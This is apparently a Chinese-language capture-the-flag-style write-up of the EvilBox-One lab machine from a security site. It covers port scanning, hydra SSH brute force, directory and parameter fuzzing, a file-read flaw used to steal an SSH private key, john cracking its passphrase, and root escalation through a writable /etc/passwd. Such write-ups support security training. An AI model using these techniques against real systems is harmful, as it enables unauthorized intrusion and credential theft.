OSCP系列靶场-Esay-EvilBox-One

admin 2023年8月6日21:13:48评论25 views字数 4897阅读16分19秒阅读模式

获网安教程

免费&进群

OSCP系列靶场-Esay-EvilBox-One  
OSCP系列靶场-Esay-EvilBox-One

本文由掌控安全学院-杳若投稿

OSCP系列靶场-Esay-EvilBox-One

总结

getwebshell → 通过超级强的目录爆破字典(添加后缀)得到端点 → 测试发现文件读取 → 读取用户名以及ssh密钥 → john破译密钥的密码 → ssh登录

提 权 思 路 → 发现suidpasswd → 覆盖root密码/添加root权限的账号密码

准备工作

  • 启动VPN
    获取攻击机IP > 192.168.45.211

OSCP系列靶场-Esay-EvilBox-One

  • 启动靶机
    获取目标机器IP > 192.168.245.212

OSCP系列靶场-Esay-EvilBox-One

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次

    1. sudo nmap --min-rate 10000 -p- 192.168.245.212

OSCP系列靶场-Esay-EvilBox-One

通过两次收集到的端口:→22,80

目标端口对应服务探测

  1. # tcp探测

  2. sudo nmap -sT -sV -O -sC -p22,80 192.168.245.212

OSCP系列靶场-Esay-EvilBox-One

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用

通过Nmap探测获得SSH的版本信息,可以尝试利用
OpenSSH 7.9p1 Debian 10+deb10u2

  1. # 进入msf

  2. msfconsole

  3. # 搜索对应脚本

  4. msf6 > searchsploit openssh 7.9

7.9p1的枚举脚本较多,实在没思路的再来尝试

22-SSH协议支持的登录方式

通过Nmap探测获得SSH的版本信息,在获取到某个用户名之后尝试

  1. ssh root@192.168.245.212 -v

  2. # 如果显示publickey、password就是都支持

说明存在root,并且可以密码爆破和私钥登录

OSCP系列靶场-Esay-EvilBox-One

22-SSH弱口令爆破(等待)

尝试root账户的密码爆破,利用工具hydra,线程-t为6

  1. hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.245.212 ssh -s 22

OSCP系列靶场-Esay-EvilBox-One

22-SSH手动登录尝试(无)

尝试root账户的密码爆破发现报错之后进行手动尝试

  1. ssh root@192.168.245.212 -p 22

  2. # 密码尝试

  3. password > root

OSCP系列靶场-Esay-EvilBox-One

80-HTTP端口的信息收集

访问 http://192.168.245.212:80从源码泄露开始

OSCP系列靶场-Esay-EvilBox-One

信息收集-源码查看

  1. # 包括文章中是否写明一些敏感信息

  2. curl http://192.168.245.212:80

无可用信息

OSCP系列靶场-Esay-EvilBox-One

信息收集-目录扫描

信息收集-目录扫描初步
  1. dirsearch -u http://192.168.245.212:80 -x 302,403

发现secret目录,301说明目录内还有内容,从目录名上看有戏,接着往下扫描并进行递归

OSCP系列靶场-Esay-EvilBox-One

  1. dirsearch -u http://192.168.245.212:80/secret -x 302,403 -r 2

扫出了index.html

OSCP系列靶场-Esay-EvilBox-One
因为扫出了目录,深层次的扫描待选

  1. 信息收集-目录扫描(后缀)

  2. 信息收集-目录扫描(深度/大字典)

  3. 信息收集-目录扫描(深度/大字典后缀)

信息收集-端点探测

/robots.txt端点

发现文本Hello H4x0r,推测用户名为H4x0r

  1. Hello H4x0r

OSCP系列靶场-Esay-EvilBox-One

/secret/index.html端点

一片空白,源码中似乎也没有任何内容

OSCP系列靶场-Esay-EvilBox-One

思考

从现有情况来看,我可以用九头蛇尝试爆破H4x0r
同时利用更大的字典扫目录,先从/secret端点开始,同时进行

  1. hydra -l H4x0r -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.245.212 ssh -s 22

OSCP系列靶场-Esay-EvilBox-One

  1. # -t 指定线程 -x 添加后缀扩展名 -k 禁用ssl

  2. # 考虑到信息收集网站的后缀是php 添加一些后缀内容

  3. gobuster dir -u http://192.168.243.212/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 100 -x .php,.zip,.html -k

OSCP系列靶场-Esay-EvilBox-One

在经历了一大堆的错误之后得到了唯一一个200的端点/evil.php /(ㄒoㄒ)/

OSCP系列靶场-Esay-EvilBox-One

信息收集-端点访问

/secret/evil.php端点

访问发现依旧什么都没有,从文件名来看可能是php代码

OSCP系列靶场-Esay-EvilBox-One
尝试访问/secret/evil.php~没看到源码

OSCP系列靶场-Esay-EvilBox-One

漏洞利用-getwebshell

ffuf得到参数

http://192.168.245.212:80/secret/evil.php在不清楚用途的情况下可以尝试fuzz一下参数
在使用字典上选择了目录爆破的字典/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

  1. # -u 指定URL FUZZ 暴力破解的地方 -w 指定字典 -fs 0 不限制文件大小

  2. ffuf -u 'http://192.168.243.212:80/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0 > output.txt

通过fuzz发现了一个有效参数command

OSCP系列靶场-Esay-EvilBox-One

OSCP系列靶场-Esay-EvilBox-One

漏洞利用-文件读取

通过测试发现evil是一个文件读取的功能
/etc/passwd下发现了用户mowree (所以那个robots提示的用户名是啥意思?)

OSCP系列靶场-Esay-EvilBox-One
通常我们利用文件读取和getwebshell关联的莫过于读取用户密码或者密钥,来登录SSH

读取加密密码(失败)

因为是用户权限读不到
http://192.168.245.212:80/secret/evil.php?command=/etc/shadow

OSCP系列靶场-Esay-EvilBox-One

读取SSH密钥

因为是文件读取不是路径遍历,我们要清楚用户底下有没有什么机密的文件,利用工具FUZZ一下

  1. ffuf -u 'http://192.168.245.212:80/secret/evil.php?command=/home/mowree/FUZZ' -w /usr/share/wordlists/rockyou.txt -fs 0

不过通常用户底下的机密文件是隐藏文件的比较多
我在这里用手动检查了以下几个

  1. /home/mowree/.bash_history # 历史操作

  2. /home/mowree/.mysql_history

  3. /home/mowree/.ssh/id_rsa # 私钥

  4. /home/mowree/.ssh/id_rsa.pub

  5. /home/mowree/.ssh/authorized_keys

OSCP系列靶场-Esay-EvilBox-One
检查发现存在私钥文件,那么我们可以直接利用私钥免密登录

  1. # 保存下来

  2. curl http://192.168.243.212:80/secret/evil.php?command=/home/mowree/.ssh/id_rsa > id_rsa

  3. # 免密登录

  4. sudo ssh -i id_rsa mowree@192.168.243.212 -p22

登录发现需要密钥的密码

OSCP系列靶场-Esay-EvilBox-One

暴力破解ssh密钥密码

破解密钥密码我们用john

  1. # 利用john的脚本ssh2john.py将私钥id_rsa换成能爆破的hash

  2. /usr/share/john/ssh2john.py id_rsa > ssh.hash

  3. # 利用john离线破译ssh-hash的密码

  4. john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash

发现了密码unicorn

OSCP系列靶场-Esay-EvilBox-One

22-SSH密钥登录

获取密钥之后指定密钥进行登录

  1. sudo ssh -i id_rsa mowree<span>@192.168.243.212</span> -p22

  2. password &gt; unicorn

死活都登录不上,研究了一下说明是我的id_rsa的权限开的太大了

OSCP系列靶场-Esay-EvilBox-One
首先把权限减小 chmod 600 id_rsa,登录成功

OSCP系列靶场-Esay-EvilBox-One

内网遨游-getshell

FLAG1获取

  1. mowree@EvilBoxOne:~$ find / -name local.txt 2>/dev/null

  2. /home/mowree/local.txt

  3. mowree@EvilBoxOne:~$ cat /home/mowree/local.txt

  4. **********************

OSCP系列靶场-Esay-EvilBox-One

提权基础(内网信息收集)

提权的本质在于枚举

检测Linux操作系统的发行版本

  1. # 确定发行版本

  2. cat /etc/*-release

OSCP系列靶场-Esay-EvilBox-One
发行版本是Debian

检测Linux操作系统的内核版本

  1. mowree@EvilBoxOne:~$ uname -a

  2. Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux

内核版本4.19.0

OSCP系列靶场-Esay-EvilBox-One

sudo收集

查找具有sudo权限,且不需要密码的可提权文件

  1. # 利用sudo -l寻找

  2. sudo -l

OSCP系列靶场-Esay-EvilBox-One

suid权限收集

搜索suid文件权限

  1. # -perm 文件权限

  2. mowree@EvilBoxOne:~$ find / -perm -u=s -type f 2>/dev/null

  3. /usr/lib/openssh/ssh-keysign

  4. /usr/lib/eject/dmcrypt-get-device

  5. /usr/lib/dbus-1.0/dbus-daemon-launch-helper

  6. /usr/bin/mount

  7. /usr/bin/newgrp

  8. /usr/bin/passwd

  9. /usr/bin/umount

  10. /usr/bin/chfn

  11. /usr/bin/chsh

  12. /usr/bin/gpasswd

  13. /usr/bin/su

  14. /usr/bin/fusermount

看到了/usr/bin/passwd尝试一下/etc/passwd权限收集

  1. ls -al /etc/passwd

发现文件具有写入权限,在此基础上提权的方式有两种

OSCP系列靶场-Esay-EvilBox-One

权限提升

/etc/passwd提权

提权方式一-覆盖root密码

覆盖掉root的密码

  1. # Kali机器使用openssl生成密码

  2. sudo openssl passwd

生成了123456的加密密码$1$Dvnrw7X5$KholV2Kn58LkDnvJ5aFVF.

OSCP系列靶场-Esay-EvilBox-One

目标机器上覆盖

  1. # 将root中x替换掉 root:x:0:0:root:/root:/bin/bash

  2. vim /etc/passwd

  3. -----vim------

  4. root:$1$Dvnrw7X5$KholV2Kn58LkDnvJ5aFVF.:0:0:root:/root:/bin/bash

  5. --------------

  6. # su默认root账户提权,输入密码

  7. su

x替换成密码

OSCP系列靶场-Esay-EvilBox-One

提权方式二-写入root权限的账号以及密码

目标机器上写入新的root账号YaoRuo

  1. # 利用echo写入/etc/passwd底下,新的密码

  2. echo 'YaoRuo:$1$Dvnrw7X5$KholV2Kn58LkDnvJ5aFVF.:0:0::/root:/bin/bash' &gt;&gt; /etc/passwd

  3. # su提权YaoRuo账户,输入密码

  4. su YaoRuo

这样添加了一个YaoRuoroot账户,进入就是root权限

OSCP系列靶场-Esay-EvilBox-One
提权成功

OSCP系列靶场-Esay-EvilBox-One

FLAG2获取

  1. root<span>@EvilBoxOne</span>:/home/mowree# cat /root/proof.txt

  2. *********************

完结撒花~

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

OSCP系列靶场-Esay-EvilBox-One

没看够~?欢迎关注!

分享本文到朋友圈,可以凭截图找老师领取

上千教程+工具+交流群+靶场账号

 

OSCP系列靶场-Esay-EvilBox-One

 分享后扫码加我


回顾往期内容

Xray挂机刷漏洞

零基础学黑客,该怎么学?

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

代码审计 | 这个CNVD证书拿的有点轻松

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月6日21:13:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP系列靶场-Esay-EvilBox-Onehttps://cn-sec.com/archives/1934211.html

发表评论

匿名网友 填写信息